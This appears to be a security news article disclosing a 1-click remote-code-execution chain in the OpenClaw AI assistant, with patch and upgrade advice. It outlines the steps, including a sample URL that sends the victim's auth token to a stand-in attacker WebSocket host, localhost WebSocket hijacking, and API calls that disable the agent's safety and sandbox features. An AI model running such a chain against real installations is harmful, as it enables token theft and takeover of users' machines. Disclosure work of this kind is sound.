A critical vulnerability in the popular AI assistant Moltbot (now OpenClaw) allows attackers to steal authentication tokens and execute remote code with a single click, affecting over 100,000 developers.
A critical security vulnerability has been discovered in Moltbot (now OpenClaw), the popular open-source AI personal assistant trusted by over 100,000 developers. The vulnerability allows attackers to execute remote code on victims' machines with a single click, potentially exposing sensitive data including iMessage, WhatsApp, Slack access, and Stripe API keys.
The Vulnerability Chain
The security flaw was first identified by depthfirst's General Security Intelligence system, which mapped the application's data flow to uncover a dangerous logic gap. The vulnerability chain works as follows:
- URL Parameter Injection: The application's
app-settings.tsblindly accepts agatewayUrlquery parameter from the URL and persists it to storage without validation - Immediate Connection:
app-lifecycle.tstriggersconnectGateway()immediately after settings are applied, establishing a connection to the attacker-controlled gateway - Token Leakage:
gateway.tsautomatically bundles the security-sensitiveauthTokeninto the system's connection handshake to the new gateway
The 1-Click Exploit
Mav Levin, Founding Security Researcher at depthfirst, chained this vulnerability with a WebSocket origin validation bypass to create a complete 1-Click RCE exploit:
- Victim visits malicious site: Attacker.com loads JavaScript that opens a hidden window to
http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 - Token theft: The attacker's WebSocket server receives the victim's authentication token
- Local connection bypass: JavaScript pivots through the victim's browser to connect to
ws://localhost:18789(the default OpenClaw server) - Sandbox escape: API requests disable safety features and container restrictions
- Code execution: Final
node.invokerequest executes arbitrary commands on the victim's machine
The entire attack chain executes in milliseconds without any user interaction or approval prompts.
Technical Details
The vulnerability exploits several security gaps:
- Same Origin Policy bypass: While SOP prevents HTTP requests between origins, WebSocket connections don't enforce this, and OpenClaw's WebSocket server fails to validate the
Originheader - Cross-Site WebSocket Hijacking (CSWSH): This allows the attacker to pivot through the victim's browser to access localhost
- API privilege abuse: The stolen token grants
operator.adminandoperator.approvalsscopes, allowing the attacker to disable safety features without exploiting sandbox implementations
Patch and Disclosure
The OpenClaw team addressed the issue quickly, releasing a patch that adds a gateway URL confirmation modal to prevent auto-connection without user prompt. All versions up to v2026.1.24-1 are vulnerable.
Users are advised to:
- Upgrade to the latest version immediately
- Rotate authentication tokens if compromise is suspected
- Review security configurations for AI assistants with elevated permissions
This vulnerability highlights the critical security risks when granting AI agents "god mode" permissions over personal and professional digital assets. The combination of logic flaws, insufficient input validation, and overly permissive API scopes created a perfect storm for exploitation.
For developers shipping code, depthfirst offers automated security intelligence to catch these logic flaws before attackers can exploit them. The company is building tools to map application lifecycles and identify dangerous data flow patterns that traditional security scans might miss.
Comments
Please log in or register to join the discussion